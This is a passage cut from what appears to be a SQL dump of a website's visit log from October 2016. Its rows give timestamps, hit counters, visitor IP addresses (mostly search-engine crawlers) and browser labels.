163.172.65.46','other'),(67928,1476386897,1,1,0,0,'163.172.65.5','other'),(67929,1476386976,1,0,1,0,'66.249.76.45',''),(67930,1476387391,1,1,0,0,'163.172.64.188','other'),(67931,1476387517,1,1,0,0,'51.255.65.93','other'),(67932,1476388094,1,1,0,0,'94.178.147.18','firefox'),(67933,1476388761,2,0,2,0,'66.249.76.45',''),(67934,1476388929,1,1,0,0,'130.193.50.34','other'),(67935,1476389039,1,1,0,0,'163.172.65.64','other'),(67936,1476389056,1,1,0,0,'164.132.161.87','other'),(67937,1476389083,1,1,0,0,'66.102.9.29','other'),(67938,1476389288,1,0,1,0,'66.249.76.46',''),(67939,1476389495,1,1,0,0,'164.132.161.92','other'),(67940,1476389987,1,1,0,0,'51.255.65.16','other'),(67941,1476390700,1,1,0,0,'163.172.65.38','other'),(67942,1476391206,1,1,0,0,'93.80.41.89','chrome'),(67943,1476391852,1,1,0,0,'163.172.64.236','other'),(67944,1476392439,1,0,1,0,'66.249.66.84',''),(67945,1476392682,1,1,0,0,'66.102.9.25','other'),(67946,1476393107,1,1,0,0,'51.255.65.20','other'),(67947,1476394154,1,1,0,0,'163.172.66.102','other'),(67948,1476396137,1,1,0,0,'163.172.66.30','other'),(67949,1476396458,1,1,0,0,'66.102.9.29','other'),(67950,1476396471,1,1,0,0,'164.132.161.2','other'),(67951,1476396855,1,1,0,0,'163.172.64.247','other'),(67952,1476397384,1,1,0,0,'51.255.65.36','other'),(67953,1476397568,1,0,1,0,'66.249.66.84',''),(67954,1476397619,2,0,2,0,'66.249.76.45',''),(67955,1476397851,1,0,1,0,'66.249.66.81',''),(67956,1476397901,1,1,0,0,'51.255.65.14','other'),(67957,1476397977,1,1,0,0,'164.132.161.80','other'),(67958,1476398468,1,1,0,0,'163.172.64.230','other'),(67959,1476399088,1,0,1,0,'66.249.76.45',''),(67960,1476400013,1,1,0,0,'66.102.9.27','other'),(67961,1476400384,1,1,0,0,'164.132.161.67','other'),(67962,1476400605,1,1,0,0,'130.193.50.34','other'),(67963,1476400757,1,1,0,0,'163.172.65.218','other'),(67964,1476401066,1,1,0,0,'163.172.65.181','other'),(67965,1476401237,1,1,0,0,'163.172.66.2','other'),(67966,1476401612,1,1,0,0,'51.255.65.74','other'),(67967,1476401625,1,1,0,0,'164.132.161.7','other'),(67968,1476402051,1,1,0,0,'51.255.65.60','other'),(67969,1476402925,1,0,1,0,'66.249.76.47',''),(67970,1476403612,1,1,0,0,'66.102.9.25','other'),(67971,1476404612,1,1,0,0,'95.27.245.109','msie'),(67972,1476405161,1,1,0,0,'157.55.39.135','other'),(67973,1476406243,1,1,0,0,'157.55.39.135','other'),(67974,1476407216,1,1,0,0,'66.102.9.27','other'),(67975,1476407374,1,1,0,0,'163.172.65.226','other'),(67976,1476408689,1,1,0,0,'163.172.65.120','other'),(67977,1476409538,1,0,1,0,'66.249.66.84',''),(67978,1476409857,1,1,0,0,'164.132.161.89','other'),(67979,1476410895,1,1,0,0,'66.102.9.27','other'),(67980,1476411085,1,1,0,0,'163.172.65.43','other'),(67981,1476411197,1,1,0,0,'51.255.65.84','other'),(67982,1476411732,1,1,0,0,'163.172.66.119','other'),(67983,1476412115,1,0,1,0,'66.249.76.46',''),(67984,1476412383,1,1,0,0,'51.255.65.35','other'),(67985,1476412790,1,0,1,0,'66.249.76.47',''),(67986,1476413422,1,1,0,0,'130.193.50.34','other'),(67987,1476413505,1,1,0,0,'180.76.15.143','other'),(67988,1476413854,1,1,0,0,'164.132.161.38','other'),(67989,1476414345,1,1,0,0,'130.193.50.34','other'),(67990,1476414377,1,1,0,0,'66.102.9.29','other'),(67991,1476414709,1,0,1,0,'66.249.76.45',''),(67992,1476415625,1,1,0,0,'163.172.66.14','other'),(67993,1476415851,1,1,0,0,'163.172.65.220','other'),(67994,1476415904,1,1,0,0,'141.8.183.25','other'),(67995,1476416149,1,1,0,0,'51.255.65.60','other'),(67996,1476416269,1,1,0,0,'51.255.65.92','other'),(67997,1476416863,1,1,0,0,'94.179.120.178','firefox'),(67998,1476417520,1,1,0,0,'163.172.66.53','other'),(67999,1476418089,1,1,0,0,'66.102.9.27','other'),(68000,1476418472,1,1,0,0,'107.167.103.170','other'),(68001,1476418604,1,1,0,0,'164.132.161.52','other'),(68002,1476418647,1,0,1,0,'66.249.76.46',''),(68003,1476419093,1,1,0,0,'163.172.65.34','other'),(68004,1476419694,1,0,1,0,'66.249.76.46',''),(68005,1476419763,1,1,0,0,'51.255.65.90','other'),(68006,1476420569,1,0,1,0,'66.249.76.47',''),(68007,1476420856,1,1,0,0,'51.255.65.57','other'),(68008,1476421304,1,1,0,0,'66.102.9.29','chrome'),(68009,1476421992,1,1,0,0,'66.102.9.27','other'),(68010,1476422622,1,1,0,0,'46.211.66.218','chrome'),(68011,1476422761,1,1,0,0,'163.172.66.60','other'),(68012,1476423516,1,1,0,0,'164.132.161.34','other'),(68013,1476423628,1,0,1,0,'66.249.76.81',''),(68014,1476424604,1,1,0,0,'163.172.66.63','other'),(68015,1476425227,1,1,0,0,'51.255.65.76','other'),(68016,1476425294,1,1,0,0,'66.102.9.29','other'),(68017,1476425698,1,1,0,0,'157.55.39.135','other'),(68018,1476425958,2,2,0,0,'66.102.9.29','chrome'),(68019,1476425981,1,1,0,0,'8.29.198.34','other'),(68020,1476425982,1,1,0,0,'91.196.178.100','chrome'),(68022,1476425983,1,1,0,0,'66.102.9.27','chrome'),(68023,1476425987,1,1,0,0,'91.196.178.100','other'),(68024,1476426522,1,1,0,0,'66.102.9.25','chrome'),(68025,1476426792,1,1,0,0,'51.255.65.42','other'),(68026,1476427111,1,1,0,0,'94.178.147.18','firefox'),(68027,1476427202,1,1,0,0,'66.102.9.27','other'),(68028,1476427235,1,0,1,0,'66.249.76.79',''),(68029,1476427414,1,0,1,0,'66.249.76.45',''),(68030,1476428049,1,1,0,0,'163.172.65.123','other'),(68031,1476428958,1,0,1,0,'66.249.66.180',''),(68032,1476429084,1,1,0,0,'51.255.65.31','other'),(68033,1476429196,1,1,0,0,'66.102.9.27','other'),(68034,1476429374,1,1,0,0,'164.132.161.11','other'),(68035,1476430853,1,1,0,0,'163.172.66.103','other'),(68036,1476431208,1,1,0,0,'163.172.66.91','other'),(68037,1476431500,1,1,0,0,'195.162.71.243','chrome'),(68038,1476431511,1,0,1,0,'66.249.76.47',''),(68039,1476431664,1,0,1,0,'66.249.76.46',''),(68040,1476432321,1,1,0,0,'163.172.66.179','other'),(68041,1476432412,1,1,0,0,'164.132.161.4','other'),(68042,1476432476,1,1,0,0,'66.102.9.27','other'),(68043,1476432540,1,1,0,0,'163.172.66.151','other'),(68044,1476432987,1,1,0,0,'66.249.93.13','chrome'),(68045,1476433055,1,1,0,0,'163.172.66.29','other'),(68046,1476433534,1,1,0,0,'163.172.64.253','other'),(68047,1476434728,1,1,0,0,'51.255.65.26','other'),(68048,1476435509,1,1,0,0,'163.172.65.112','other'),(68049,1476435548,1,1,0,0,'163.172.66.11','other'),(68050,1476435901,1,1,0,0,'164.132.161.58','other'),(68051,1476436261,1,1,0,0,'66.102.9.25','other'),(68052,1476437185,1,0,1,0,'66.249.66.84',''),(68053,1476437284,1,1,0,0,'163.172.66.175','other'),(68054,1476437407,1,0,1,0,'66.249.76.46',''),(68055,1476438472,1,1,0,0,'164.132.161.44','other'),(68056,1476438601,1,1,0,0,'94.178.147.18','firefox'),(68057,1476438888,1,1,0,0,'51.255.65.35','other'),(68058,1476439021,1,1,0,0,'157.55.39.135','other'),(68059,1476439163,1,1,0,0,'164.132.161.47','other'),(68060,1476439601,1,1,0,0,'66.102.9.27','other'),(68061,1476440235,1,1,0,0,'94.178.147.18','firefox'),(68062,1476440952,1,1,0,0,'163.172.65.246','other'),(68063,1476441103,1,1,0,0,'51.255.65.89','other'),(68064,1476441662,1,1,0,0,'94.178.147.18','firefox'),(68065,1476442605,1,1,0,0,'163.172.64.187','other'),(68066,1476442759,1,0,1,0,'68.180.229.114',''),(68067,1476443152,1,1,0,0,'66.102.9.29','other'),(68068,1476444090,1,1,0,0,'51.255.65.82','other'),(68069,1476444727,1,1,0,0,'163.172.64.183','other'),(68070,1476445611,1,1,0,0,'51.255.65.71','other'),(68071,1476445718,1,1,0,0,'163.172.65.13','other'),(68072,1476445905,1,1,0,0,'180.76.15.153','other'),(68073,1476446139,1,1,0,0,'163.172.65.222','other'),(68074,1476446611,1,0,1,0,'66.249.66.81',''),(68075,1476446692,1,1,0,0,'91.196.178.101','chrome'),(68076,1476446805,1,1,0,0,'66.102.9.25','other'),(68077,1476447124,1,1,0,0,'40.77.167.4','other'),(68078,1476447351,1,1,0,0,'163.172.66.96','other'),(68079,1476447775,1,1,0,0,'163.172.65.246','other'),(68080,1476448152,1,1,0,0,'163.172.65.48','other'),(68081,1476448427,1,1,0,0,'164.132.161.7','other'),(68082,1476448839,1,0,1,0,'66.249.76.45',''),(68083,1476449646,1,1,0,0,'163.172.66.82','other'),(68084,1476450364,1,1,0,0,'66.102.9.27','other'),(68085,1476450752,1,1,0,0,'163.172.65.62','other'),(68086,1476451311,1,1,0,0,'51.255.65.23','other'),(68087,1476451601,1,1,0,0,'51.255.65.80','other'),(68088,1476451692,1,1,0,0,'163.172.66.181','other'),(68089,1476452185,1,1,0,0,'163.172.65.252','other'),(68090,1476452198,1,1,0,0,'80.93.117.95','firefox'),(68091,1476453066,1,1,0,0,'94.178.147.18','firefox'),(68092,1476453671,1,1,0,0,'51.255.65.28','other'),(68093,1476453962,1,1,0,0,'66.102.9.27','other'),(68094,1476454023,1,1,0,0,'51.255.65.87','other'),(68095,1476454654,1,1,0,0,'163.172.66.60','other'),(68096,1476454799,1,1,0,0,'163.172.66.40','other'),(68097,1476454837,1,0,1,0,'66.249.76.81',''),(68098,1476454972,1,1,0,0,'163.172.65.68','other'),(68099,1476456403,1,1,0,0,'51.255.65.22','other'),(68100,1476456805,1,1,0,0,'164.132.161.74','other'),(68101,1476456922,1,1,0,0,'157.55.39.224','other'),(68102,1476456932,1,1,0,0,'163.172.66.9','other'),(68103,1476458098,1,1,0,0,'66.102.9.25','other'),(68104,1476458394,1,1,0,0,'164.132.161.73','other'),(68105,1476458936,1,1,0,0,'163.172.65.52','other'),(68107,1476458959,1,1,0,0,'157.55.39.135','other'),(68108,1476459105,1,1,0,0,'91.196.178.168','other'),(68109,1476459165,1,0,1,0,'66.249.76.46',''),(68110,1476459415,1,1,0,0,'51.255.65.29','other'),(68111,1476459453,1,1,0,0,'51.255.65.5','other'),(68112,1476459613,1,1,0,0,'163.172.65.121','other'),(68113,1476459839,1,1,0,0,'51.255.65.38','other'),(68114,1476460167,2,0,2,0,'66.249.76.47',''),(68115,1476460392,1,0,1,0,'66.249.76.46',''),(68116,1476460461,1,0,1,0,'66.249.66.84',''),(68117,1476460583,1,0,1,0,'66.249.76.79',''),(68118,1476460813,1,1,0,0,'141.8.183.25','other'),(68119,1476460915,1,1,0,0,'91.196.178.38','chrome'),(68120,1476460925,1,1,0,0,'164.132.161.22','other'),(68121,1476461166,2,0,2,0,'66.249.76.47',''),(68122,1476461538,1,1,0,0,'163.172.65.184','other'),(68123,1476461652,1,1,0,0,'163.172.66.156','other'),(68124,1476461703,1,1,0,0,'66.102.9.27','other'),(68125,1476462114,1,1,0,0,'163.172.64.235','other'),(68126,1476462235,1,1,0,0,'51.255.65.6','other'),(68127,1476462506,1,1,0,0,'91.196.178.34','chrome'),(68128,1476462592,1,1,0,0,'157.55.39.224','other'),(68129,1476462744,1,0,1,0,'66.249.76.81',''),(68130,1476462798,1,0,1,0,'66.249.76.47',''),(68131,1476462813,1,0,1,0,'66.249.76.45',''),(68132,1476462877,1,0,1,0,'66.249.76.46',''),(68133,1476463035,1,0,1,0,'66.249.66.87',''),(68134,1476463222,1,1,0,0,'130.193.50.34','other'),(68135,1476463311,1,1,0,0,'51.255.65.26','other'),(68136,1476463314,2,2,0,0,'130.193.51.19','other'),(68137,1476463962,1,1,0,0,'51.255.65.31','other'),(68138,1476464042,1,1,0,0,'164.132.161.28','other'),(68139,1476464184,1,1,0,0,'95.108.225.195','chrome'),(68140,1476464567,1,1,0,0,'51.255.65.46','other'),(68141,1476464843,1,1,0,0,'66.102.9.29','chrome'),(68142,1476465323,1,1,0,0,'66.102.9.29','other'),(68143,1476466680,1,1,0,0,'51.255.65.39','other'),(68144,1476467066,1,0,1,0,'66.249.76.47',''),(68145,1476467682,1,0,1,0,'66.249.66.97',''),(68146,1476467694,1,1,0,0,'164.132.161.76','other'),(68147,1476467734,1,1,0,0,'164.132.161.65','other'),(68148,1476468661,1,1,0,0,'51.255.65.61','other'),(68149,1476468892,1,1,0,0,'66.102.9.27','other'),(68150,1476469425,1,1,0,0,'163.172.66.98','other'),(68151,1476469600,1,1,0,0,'157.55.39.135','other'),(68152,1476469689,1,1,0,0,'163.172.65.204','other'),(68153,1476470333,1,1,0,0,'163.172.66.110','other'),(68154,1476470720,1,1,0,0,'164.132.161.6','other'),(68155,1476471758,1,1,0,0,'176.14.46.226','other'),(68156,1476472100,1,0,1,0,'66.249.76.45',''),(68157,1476472524,1,1,0,0,'66.102.9.27','other'),(68158,1476472525,1,1,0,0,'130.193.50.34','other'),(68159,1476472930,1,1,0,0,'66.249.88.142','other'),(68160,1476473132,1,1,0,0,'101.100.190.200','other'),(68161,1476473171,1,1,0,0,'163.172.65.65','other'),(68162,1476474789,1,1,0,0,'164.132.161.41','other'),(68163,1476474931,1,0,1,0,'66.249.76.47',''),(68164,1476475097,1,0,1,0,'66.249.66.84',''),(68165,1476475129,1,1,0,0,'163.172.65.199','other'),(68166,1476476124,1,1,0,0,'66.102.9.25','other'),(68167,1476476415,1,1,0,0,'180.76.15.23','other'),(68168,1476476438,1,0,1,0,'66.249.76.45',''),(68169,1476476721,1,1,0,0,'163.172.66.30','other'),(68170,1476476924,1,1,0,0,'130.193.50.34','other'),(68171,1476477126,1,1,0,0,'163.172.66.65','other'),(68172,1476477160,1,1,0,0,'94.178.147.18','firefox'),(68173,1476478093,1,1,0,0,'157.55.39.224','other'),(68174,1476478311,1,1,0,0,'164.132.161.12','other'),(68175,1476478438,1,1,0,0,'163.172.65.12','other'),(68176,1476479685,1,1,0,0,'141.8.183.25','other'),(68177,1476479817,1,1,0,0,'163.172.66.135','other'),(68178,1476479917,1,1,0,0,'66.102.9.25','other'),(68179,1476480163,1,1,0,0,'51.255.65.89','other'),(68180,1476480647,1,1,0,0,'164.132.161.2','other'),(68181,1476483342,1,1,0,0,'66.102.9.25','other'),(68182,1476483380,1,1,0,0,'157.55.39.224','other'),(68183,1476483559,1,0,1,0,'66.249.76.46',''),(68184,1476485037,1,1,0,0,'163.172.66.82','other'),(68185,1476485123,1,1,0,0,'141.8.183.25','other'),(68186,1476485510,2,2,0,0,'130.193.50.34','other'),(68187,1476485679,1,0,1,0,'68.180.229.190',''),(68188,1476485893,1,1,0,0,'163.172.65.185','other'),(68189,1476486896,3,3,0,0,'130.193.50.34','other'),(68190,1476486902,1,1,0,0,'66.102.9.29','other'),(68191,1476487252,2,2,0,0,'141.8.183.25','other'),(68192,1476487333,1,1,0,0,'51.255.65.56','other'),(68193,1476488011,1,1,0,0,'178.151.143.163','other'),(68194,1476488185,2,2,0,0,'130.193.50.34','other'),(68195,1476488973,1,1,0,0,'91.121.86.136','other'),(68196,1476489780,1,1,0,0,'51.255.65.8','other'),(68197,1476489994,1,1,0,0,'163.172.66.181','other'),(68198,1476490679,1,1,0,0,'66.102.9.29','other'),(68199,1476491842,1,1,0,0,'163.172.64.248','other'),(68200,1476492666,1,1,0,0,'163.172.66.153','other'),(68201,1476493989,1,1,0,0,'164.132.161.8','other'),(68202,1476494103,1,1,0,0,'66.102.9.27','other'),(68203,1476494140,1,1,0,0,'130.193.50.34','other'),(68204,1476494218,1,1,0,0,'163.172.64.183','other'),(68205,1476496890,1,1,0,0,'163.172.66.114','other'),(68206,1476497752,1,1,0,0,'66.102.9.29','other'),(68207,1476498933,1,1,0,0,'163.172.65.241','other'),(68208,1476500337,1,1,0,0,'66.249.76.45','chrome'),(68209,1476500440,1,1,0,0,'141.8.183.25','other'),(68210,1476501569,1,1,0,0,'66.102.9.29','other'),(68211,1476502610,1,0,1,0,'66.249.69.152',''),(68212,1476502687,1,1,0,0,'164.132.161.70','other'),(68213,1476503182,1,1,0,0,'141.8.142.67','other'),(68214,1476504802,2,2,0,0,'163.172.32.175','other'),(68215,1476504845,1,1,0,0,'141.8.142.61','other'),(68216,1476504933,1,1,0,0,'66.102.9.27','other'),(68217,1476505029,1,1,0,0,'164.132.161.66','other'),(68218,1476505810,1,0,1,0,'66.249.76.47',''),(68219,1476506012,5,5,0,0,'141.8.183.25','other'),(68220,1476506095,1,0,1,0,'66.249.75.179',''),(68221,1476506741,2,0,2,0,'66.249.76.47',''),(68222,1476506768,2,0,2,0,'66.249.75.183',''),(68223,1476506922,1,0,1,0,'66.249.76.46',''),(68224,1476507504,1,1,0,0,'82.145.221.55','other'),(68225,1476508421,1,1,0,0,'163.172.65.218','other'),(68226,1476508464,1,1,0,0,'141.8.183.25','other'),(68227,1476508549,2,2,0,0,'130.193.50.34','other'),(68228,1476508582,1,1,0,0,'66.102.9.25','other'),(68229,1476509921,1,1,0,0,'94.179.88.206','chrome'),(68230,1476510225,1,1,0,0,'130.193.50.34','other'),(68231,1476511273,1,1,0,0,'163.172.66.67','other'),(68232,1476511769,1,1,0,0,'164.132.161.3','other'),(68233,1476511868,1,1,0,0,'130.193.50.34','other'),(68234,1476512131,1,1,0,0,'66.102.9.27','other'),(68235,1476512966,2,2,0,0,'130.193.50.34','other'),(68236,1476513335,2,2,0,0,'95.213.141.126','opera'),(68237,1476513365,2,2,0,0,'141.8.183.25','other'),(68238,1476514025,1,0,1,0,'66.249.75.187',''),(68239,1476514271,1,1,0,0,'164.132.161.86','other'),(68240,1476515698,1,1,0,0,'40.77.167.4','other'),(68241,1476515733,1,1,0,0,'66.102.9.29','other'),(68242,1476515737,1,1,0,0,'164.132.161.46','other'),(68243,1476515869,1,1,0,0,'66.102.9.27','chrome'),(68244,1476516007,1,1,0,0,'91.196.178.69','firefox'),(68245,1476517213,1,1,0,0,'163.172.64.250','other'),(68246,1476518109,1,1,0,0,'163.172.65.46','other'),(68247,1476519225,1,1,0,0,'164.132.161.14','other'),(68248,1476519332,1,1,0,0,'66.102.9.25','other'),(68249,1476519651,1,1,0,0,'157.55.39.224','other'),(68250,1476520791,1,0,1,0,'66.249.76.47',''),(68251,1476521315,1,1,0,0,'157.55.39.224','other'),(68252,1476522442,1,1,0,0,'130.193.50.34','other'),(68253,1476522488,1,1,0,0,'163.172.65.226','other'),(68254,1476522690,1,1,0,0,'164.132.161.50','other'),(68255,1476522851,1,1,0,0,'164.132.161.39','other'),(68256,1476522994,1,1,0,0,'66.102.9.25','other'),(68257,1476523475,1,1,0,0,'130.193.50.34','other'),(68258,1476523510,1,1,0,0,'164.132.161.29','other'),(68259,1476523743,1,0,1,0,'66.249.76.81',''),(68260,1476523781,1,0,1,0,'66.249.76.45',''),(68261,1476525280,1,1,0,0,'163.172.65.49','other'),(68262,1476525772,1,0,1,0,'66.249.76.47',''),(68263,1476526207,1,1,0,0,'164.132.161.36','other'),(68264,1476526456,1,0,1,0,'66.249.75.183',''),(68265,1476526637,1,1,0,0,'66.102.9.29','other'),(68266,1476526650,1,1,0,0,'163.172.64.188','other'),(68267,1476526868,1,1,0,0,'180.76.15.155','other'),(68268,1476527714,1,0,1,0,'66.249.69.155',''),(68269,1476527730,1,1,0,0,'51.255.65.57','other'),(68270,1476528133,1,1,0,0,'51.255.65.3','other'),(68271,1476529450,1,1,0,0,'51.255.65.16','other'),(68272,1476529633,1,1,0,0,'157.55.39.224','other'),(68273,1476529903,1,1,0,0,'163.172.65.189','other'),(68274,1476530194,1,1,0,0,'66.102.9.29','other'),(68275,1476532660,1,1,0,0,'178.94.172.149','chrome'),(68276,1476532903,1,1,0,0,'91.196.178.38','firefox'),(68277,1476532996,1,0,1,0,'66.249.69.149',''),(68278,1476533212,1,1,0,0,'157.55.39.135','other'),(68279,1476533534,1,1,0,0,'164.132.161.9','other'),(68280,1476533920,1,1,0,0,'66.102.9.27','other'),(68281,1476534615,1,1,0,0,'163.172.65.245','other'),(68282,1476534951,1,1,0,0,'163.172.65.226','other'),(68283,1476535378,1,0,1,0,'66.249.75.187',''),(68284,1476535479,1,0,1,0,'66.249.76.47',''),(68285,1476535912,1,0,1,0,'66.249.76.46',''),(68286,1476536220,1,1,0,0,'94.178.147.18','firefox'),(68287,1476537404,1,1,0,0,'66.102.9.27','other'),(68288,1476540905,1,1,0,0,'66.102.9.27','other'),(68289,1476541641,1,0,1,0,'66.249.76.45',''),(68290,1476541958,1,1,0,0,'93.158.152.26','other'),(68291,1476542454,1,1,0,0,'109.63.224.49','firefox'),(68292,1476542523,1,1,0,0,'130.193.37.27','other'),(68293,1476543066,1,1,0,0,'5.255.253.10','other'),(68294,1476544498,1,1,0,0,'66.102.9.29','other'),(68295,1476545460,1,0,1,0,'66.249.66.81',''),(68296,1476545795,1,1,0,0,'5.255.253.36','other'),(68297,1476545998,1,1,0,0,'157.55.39.135','other'),(68298,1476546250,1,1,0,0,'5.255.253.9','other'),(68299,1476546553,1,1,0,0,'40.77.167.4','other'),(68300,1476546877,1,1,0,0,'94.178.147.18','firefox'),(68301,1476547463,1,0,1,0,'66.249.76.45',''),(68302,1476548046,1,0,1,0,'66.249.66.84',''),(68303,1476548122,1,1,0,0,'66.102.9.25','other'),(68304,1476548700,1,0,1,0,'66.249.76.45',''),(68305,1476550084,1,1,0,0,'141.8.184.22','other'),(68306,1476550252,1,1,0,0,'130.193.37.21','other'),(68307,1476550429,1,1,0,0,'5.255.253.55','other'),(68308,1476550743,1,1,0,0,'164.132.161.8','other'),(68309,1476550858,1,1,0,0,'141.8.142.58','other'),(68310,1476550864,1,1,0,0,'141.8.132.41','other'),(68311,1476551662,1,1,0,0,'217.69.133.236','other'),(68312,1476552125,1,1,0,0,'163.172.66.156','other'),(68313,1476552400,1,1,0,0,'163.172.66.58','other'),(68314,1476552851,1,1,0,0,'51.255.65.67','other'),(68315,1476552995,1,1,0,0,'163.172.66.83','other'),(68316,1476553533,1,0,1,0,'66.249.66.177',''),(68317,1476553560,1,1,0,0,'163.172.66.11','other'),(68318,1476553863,1,1,0,0,'164.132.161.46','other'),(68319,1476554212,1,1,0,0,'51.255.65.87','other'),(68320,1476554327,1,1,0,0,'180.76.15.9','other'),(68321,1476554351,1,0,1,0,'66.249.76.47',''),(68322,1476554691,1,1,0,0,'163.172.66.53','other'),(68323,1476554917,1,0,1,0,'66.249.66.177',''),(68324,1476555365,1,1,0,0,'66.102.9.27','other'),(68325,1476555429,1,0,1,0,'66.249.76.47',''),(68326,1476555671,1,0,1,0,'66.249.76.45',''),(68327,1476555917,1,1,0,0,'94.178.147.18','firefox'),(68328,1476557203,1,0,1,0,'66.249.66.99',''),(68329,1476558925,1,1,0,0,'66.102.9.27','other'),(68330,1476559087,1,0,1,0,'66.249.66.87',''),(68331,1476560261,1,0,1,0,'66.249.76.45',''),(68332,1476560284,1,0,1,0,'66.249.76.47',''),(68333,1476560517,2,2,0,0,'188.239.32.177','chrome'),(68334,1476560582,1,1,0,0,'164.132.161.81','other'),(68335,1476561016,1,1,0,0,'51.255.65.81','other'),(68336,1476561039,1,1,0,0,'163.172.66.155','other'),(68337,1476561141,1,1,0,0,'163.172.65.26','other'),(68338,1476561284,1,1,0,0,'141.8.183.25','other'),(68339,1476561448,1,1,0,0,'188.239.32.177','chrome'),(68340,1476561795,1,1,0,0,'180.76.15.135','other'),(68341,1476562013,1,0,1,0,'66.249.66.87',''),(68342,1476562249,1,1,0,0,'164.132.161.40','other'),(68343,1476562527,1,1,0,0,'66.102.9.27','other'),(68344,1476562531,1,1,0,0,'163.172.65.120','other'),(68345,1476562634,1,1,0,0,'163.172.65.214','other'),(68346,1476562682,1,1,0,0,'164.132.161.66','other'),(68347,1476563507,1,0,1,0,'66.249.76.47',''),(68348,1476563721,1,0,1,0,'66.249.66.84',''),(68349,1476563989,1,1,0,0,'40.77.167.4','other'),(68350,1476564277,1,1,0,0,'163.172.65.228','other'),(68351,1476565795,1,0,1,0,'66.249.66.87',''),(68352,1476566415,1,1,0,0,'66.102.9.25','other'),(68353,1476567333,1,0,1,0,'66.249.66.84',''),(68354,1476567972,1,1,0,0,'164.132.161.95','other'),(68355,1476568280,1,0,1,0,'66.249.66.81',''),(68356,1476568513,2,0,2,0,'66.249.66.84',''),(68357,1476568865,1,1,0,0,'130.193.50.34','other'),(68358,1476569891,1,1,0,0,'66.102.9.29','other'),(68359,1476570834,1,0,1,0,'66.249.66.81',''),(68360,1476571357,2,0,2,0,'66.249.66.87',''),(68361,1476571417,1,1,0,0,'163.172.66.3','other'),(68362,1476571457,1,1,0,0,'163.172.66.158','other'),(68363,1476571858,1,1,0,0,'163.172.64.244','other'),(68364,1476572843,1,1,0,0,'40.77.167.83','other'),(68365,1476573352,1,1,0,0,'163.172.65.244','other'),(68366,1476573366,1,1,0,0,'66.102.9.27','other'),(68367,1476574973,1,0,1,0,'66.249.66.180',''),(68368,1476575944,1,1,0,0,'163.172.66.70','other'),(68369,1476575994,1,1,0,0,'164.132.161.63','other'),(68370,1476576670,1,1,0,0,'66.249.66.87','chrome'),(68371,1476577009,1,1,0,0,'66.102.9.25','other'),(68372,1476577480,1,1,0,0,'66.249.66.84','chrome'),(68373,1476578059,1,1,0,0,'164.132.161.12','other'),(68374,1476578496,1,1,0,0,'66.249.66.84','chrome'),(68375,1476578532,1,1,0,0,'163.172.66.59','other'),(68376,1476578975,1,1,0,0,'51.255.65.73','other'),(68377,1476579012,2,2,0,0,'130.193.50.34','other'),(68378,1476579412,1,0,1,0,'66.249.66.87',''),(68379,1476580522,1,1,0,0,'66.102.9.29','other'),(68380,1476580557,1,1,0,0,'176.193.111.33','msie'),(68381,1476580663,1,0,1,0,'66.249.66.87',''),(68382,1476580814,1,0,1,0,'66.249.66.183',''),(68383,1476581233,1,0,1,0,'66.249.66.84',''),(68384,1476581338,1,1,0,0,'163.172.65.30','other'),(68385,1476582986,1,0,1,0,'66.249.66.84',''),(68386,1476583880,1,1,0,0,'217.69.133.69','other'),(68387,1476584164,1,1,0,0,'66.102.9.27','other'),(68388,1476584369,2,0,2,0,'66.249.66.84',''),(68389,1476584425,2,0,2,0,'66.249.66.87',''),(68390,1476584631,1,0,1,0,'66.249.66.81',''),(68391,1476584773,1,1,0,0,'51.255.65.18','other'),(68392,1476584921,1,1,0,0,'180.76.15.138','other'),(68393,1476585256,1,1,0,0,'163.172.66.24','other'),(68394,1476585293,1,1,0,0,'51.255.65.2','other'),(68395,1476585307,1,1,0,0,'163.172.65.131','other'),(68396,1476585604,1,0,1,0,'66.249.66.81',''),(68397,1476585678,1,1,0,0,'164.132.161.43','other'),(68398,1476585687,1,0,1,0,'66.249.66.84',''),(68399,1476585716,1,1,0,0,'163.172.66.181','other'),(68400,1476586823,1,0,1,0,'66.249.66.81',''),(68401,1476586914,1,0,1,0,'66.249.66.183',''),(68402,1476587101,1,1,0,0,'163.172.66.19','other'),(68403,1476587426,1,0,1,0,'66.249.66.87',''),(68404,1476589013,1,1,0,0,'66.249.66.183','chrome'),(68405,1476589096,1,1,0,0,'66.249.66.84','chrome'),(68406,1476589539,1,0,1,0,'66.249.66.87',''),(68407,1476590245,1,1,0,0,'51.255.65.18','other'),(68408,1476590594,1,1,0,0,'130.193.50.34','other'),(68409,1476591056,1,1,0,0,'128.69.206.73','msie'),(68410,1476591287,1,0,1,0,'66.249.66.84',''),(68411,1476591496,1,1,0,0,'51.255.65.21','other'),(68412,1476591843,1,1,0,0,'163.172.65.185','other'),(68413,1476592954,2,0,2,0,'66.249.66.81',''),(68414,1476592960,1,1,0,0,'157.55.39.135','other'),(68415,1476593131,2,0,2,0,'66.249.66.87',''),(68416,1476593178,1,0,1,0,'66.249.66.177',''),(68417,1476593348,1,1,0,0,'46.188.0.198','msie'),(68418,1476594075,1,1,0,0,'163.172.68.103','other'),(68419,1476594518,1,1,0,0,'163.172.65.45','other'),(68420,1476594923,1,1,0,0,'66.102.9.27','other'),(68421,1476595050,1,1,0,0,'163.172.65.12','other'),(68422,1476595218,1,0,1,0,'66.249.66.84',''),(68423,1476596738,1,1,0,0,'51.255.65.24','other'),(68424,1476596774,1,1,0,0,'180.76.15.136','other'),(68425,1476597297,1,0,1,0,'66.249.66.180',''),(68426,1476597859,1,1,0,0,'163.172.65.246','other'),(68427,1476598021,1,1,0,0,'163.172.65.116','other'),(68428,1476598375,1,1,0,0,'66.102.9.27','other'),(68429,1476598856,1,1,0,0,'144.76.29.162','other'),(68430,1476599604,1,0,1,0,'66.249.66.87',''),(68431,1476599942,1,1,0,0,'51.255.65.97','other'),(68432,1476601626,1,1,0,0,'51.255.65.28','other'),(68433,1476602202,1,1,0,0,'51.255.65.20','other'),(68434,1476602225,1,1,0,0,'66.102.9.25','chrome'),(68435,1476602309,1,1,0,0,'66.102.9.25','other'),(68436,1476602535,1,1,0,0,'51.255.65.23','other'),(68437,1476603679,1,0,1,0,'66.249.66.81',''),(68438,1476604325,1,1,0,0,'51.255.65.46','other'),(68439,1476604894,1,0,1,0,'66.249.66.87',''),(68440,1476605733,1,1,0,0,'66.102.9.25','other'),(68441,1476608016,1,1,0,0,'164.132.161.30','other'),(68442,1476608315,1,1,0,0,'51.255.65.40','other'),(68443,1476609403,1,1,0,0,'91.196.178.38','firefox'),(68444,1476609450,1,1,0,0,'66.102.9.29','other'),(68445,1476609475,1,1,0,0,'163.172.66.41','other'),(68446,1476610435,1,1,0,0,'164.132.161.38','other'),(68447,1476611050,1,1,0,0,'